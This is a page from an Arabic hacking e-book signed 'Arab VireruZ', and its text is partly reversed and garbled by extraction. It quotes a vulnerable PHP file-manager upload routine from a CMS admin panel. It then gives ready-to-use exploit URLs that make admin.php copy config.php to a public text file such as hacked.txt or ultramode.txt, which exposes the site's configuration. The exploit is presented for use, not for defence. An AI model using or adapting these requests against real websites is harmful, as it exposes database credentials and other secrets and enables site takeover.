Page 289 - بسم الله الرحمن الرحيم

P. 289

eof

-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
:‫الخطأ البرمجي‬

;(basedir = dirname($SCRIPT_FILENAME$
;textrows = 20$
;textcols = 85$

;(udir = dirname($PHP_SELF$
;"/"=if(!$wdir) $wdir

;"if($cancel) $op="FileManager
} (if($upload

;(copy($userfile,$basedir.$wdir.$userfile_name
;"lastaction = ""._UPLOADED." $userfile_name --> $wdir$
This need a rewrite -------------------------------------> OMG! WE TOTALY //

AGREEEEEEEE lmao
;("include("header.php//
;(GraphicAdmin($hlpfile//

;()html_header//
;()displaydir//
;"/"=wdir2$

;(chdir($basedir . $wdir2
;()CloseTable//

;("include("footer.php//
;("Header("Location: admin.php?op=FileManager

;exit
{

-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
:‫الثغرة‬

http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil

e=config.php&userfile_name=hacked.txt

-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
‫الثغرة بعد التعديل‬

http://www.server.net/admin.php?
upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=co

nfig.php&userfile_name=ultramode.txt

-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=
:‫عمل الثغرة‬

‫ لن تصحتاج تصحميل ملف‬ultramode.txt ‫ الى الملف النصي الموجهود‬config.php ‫=طبع ملف الكونفيج‬-

289

284 285 286 287 288 289 290 291 292 293 294